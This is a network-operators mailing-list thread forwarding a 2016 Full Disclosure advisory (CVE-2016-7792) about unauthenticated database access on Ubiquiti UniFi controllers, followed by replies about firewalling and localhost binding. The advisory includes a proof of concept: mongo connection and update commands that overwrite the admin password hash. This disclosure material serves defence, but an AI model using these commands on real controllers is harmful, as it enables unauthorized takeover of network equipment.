Re: [AFMUG] Fwd: [FD] Critical Vulnerability in Ubiquiti UniFi

[George Skorup]

Is this a Windows thing or something? On Linux I see mongod running with 
--bind_ip 127.0.0.1. My controller is running on CentOS 6 using the 
UniFi unix generic package. And MongoDB out of the EPEL repo.

On 10/3/2016 6:24 AM, Mike Hammett wrote:
I first saw this a few days ago. The port should be firewalled off, 
yes, but also they should have it bound to localhost and not a public 
facing port.



-----
Mike Hammett
Intelligent Computing Solutions <http://www.ics-il.com/>
<https://www.facebook.com/ICSIL><https://plus.google.com/+IntelligentComputingSolutionsDeKalb><https://www.linkedin.com/company/intelligent-computing-solutions><https://twitter.com/ICSIL>
Midwest Internet Exchange <http://www.midwest-ix.com/>
<https://www.facebook.com/mdwestix><https://www.linkedin.com/company/midwest-internet-exchange><https://twitter.com/mdwestix>
The Brothers WISP <http://www.thebrotherswisp.com/>
<https://www.facebook.com/thebrotherswisp>


<https://www.youtube.com/channel/UCXSdfxQv7SpoRQYNyLwntZg>
------------------------------------------------------------------------
*From: *"Paul Stewart" <p...@paulstewart.org>
*To: *"Animal Farm" <af@afmug.com>
*Sent: *Monday, October 3, 2016 3:10:28 AM
*Subject: *[AFMUG] Fwd: [FD] Critical Vulnerability in Ubiquiti UniFi

Don’t have time to test this out but thought I’d pass this along ….

My first thought is why anyone would have their ports exposed across 
the internet to allow this to happen, if it’s possibly true….

Paul


    Begin forwarded message:

    *From: *Tim Schughart <t.schugh...@prosec-networks.com
    <mailto:t.schugh...@prosec-networks.com>>
    *Subject: **[FD] Critical Vulnerability in Ubiquiti UniFi*
    *Date: *September 30, 2016 at 5:49:26 AM EDT
    *To: *fulldisclos...@seclists.org
    <mailto:fulldisclos...@seclists.org>, bugt...@securityfocus.com
    <mailto:bugt...@securityfocus.com>, webapp...@securityfocus.com
    <mailto:webapp...@securityfocus.com>
    *Cc: *"Khanh Quoc. Pham" <k.p...@prosec-networks.com
    <mailto:k.p...@prosec-networks.com>>

    Hello @all,

    together with my colleague we found two uncritical vulnerabilities
    you'll find below.

    Product: UniFi AP AC Lite
    Vendor: Ubiquiti Networks Inc.

    Internal reference: ? (Bug ID)
    Vulnerability type: Incorrect access control
    Vulnerable version: Unify 5.2.7 and possible other versions
    affected (not tested)
    Vulnerable component: Database
    Report confidence: yes
    Solution status: Not fixed by Vendor, the bug is a feature.
    Fixed versions: -
    Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham
    of ProSec Networks
    Solution date: -
    Public disclosure: 2016-09-30
    CVE reference: CVE-2016-7792
    CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


    Vulnerability Details:
    You are able to connect to the access points database, because of
    an broken authentication (OWASP TOP10). So you are able to modify
    the database and read the data. An possible scenario you'll find
    in PoC section.

    Risk:
    An attacker gets access to the database and for e.g. is able to
    change the admins password, like you see in PoC below.

    PoC:
    1. Generate SHA512 Hash with e.g.
    mkpasswd -m sha-512

    2. Connect via network to database, e.g. :
    mongo --port 27117 --host target_ip

    3. Change password via command
    "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
    
"$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
    4. Login via web interface with new password


    Best regards / Mit freundlichen Grüßen


    Tim Schughart
    CEO / Geschäftsführer

    --
    ProSec Networks e.K.
    Ellingshohl 82
    56077 Koblenz

    Website: https://www.prosec-networks.com
    E-Mail: t.schugh...@prosec.networks.com
    <mailto:t.schugh...@prosec.networks.com>
    Mobile: +49 (0)157 7901 5826
    Phone: +49 (0)261 450 930 90

    "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED
    and/or LEGALLY PROTECTED information and is intended only for the
    named recipient(s). Any unauthorized use, dissemination, copying
    or forwarding is strictly prohibited. If you are not the intended
    recipient and have received this email communication in error,
    please notify the sender immediately, delete it and destroy all
    copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz,
    HRA 21625.“

    "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS
    UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen
    enthalten und ist ausschließlich für den/die genannten Adressaten
    bestimmt. Jede unbefugte Nutzung, Weitergabe, Vervielfältigung
    oder Versendung ist strengstens verboten. Sollten Sie nicht der
    angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich
    erhalten haben, informieren Sie bitte sofort den Absender, löschen
    diese E-Mail und vernichten alle Kopien. USt-IdNr.:  DE290654714,
    Amtsgericht Koblenz, HRA 21625."

    _______________________________________________
    Sent through the Full Disclosure mailing list
    https://nmap.org/mailman/listinfo/fulldisclosure
    Web Archives & RSS: http://seclists.org/fulldisclosure/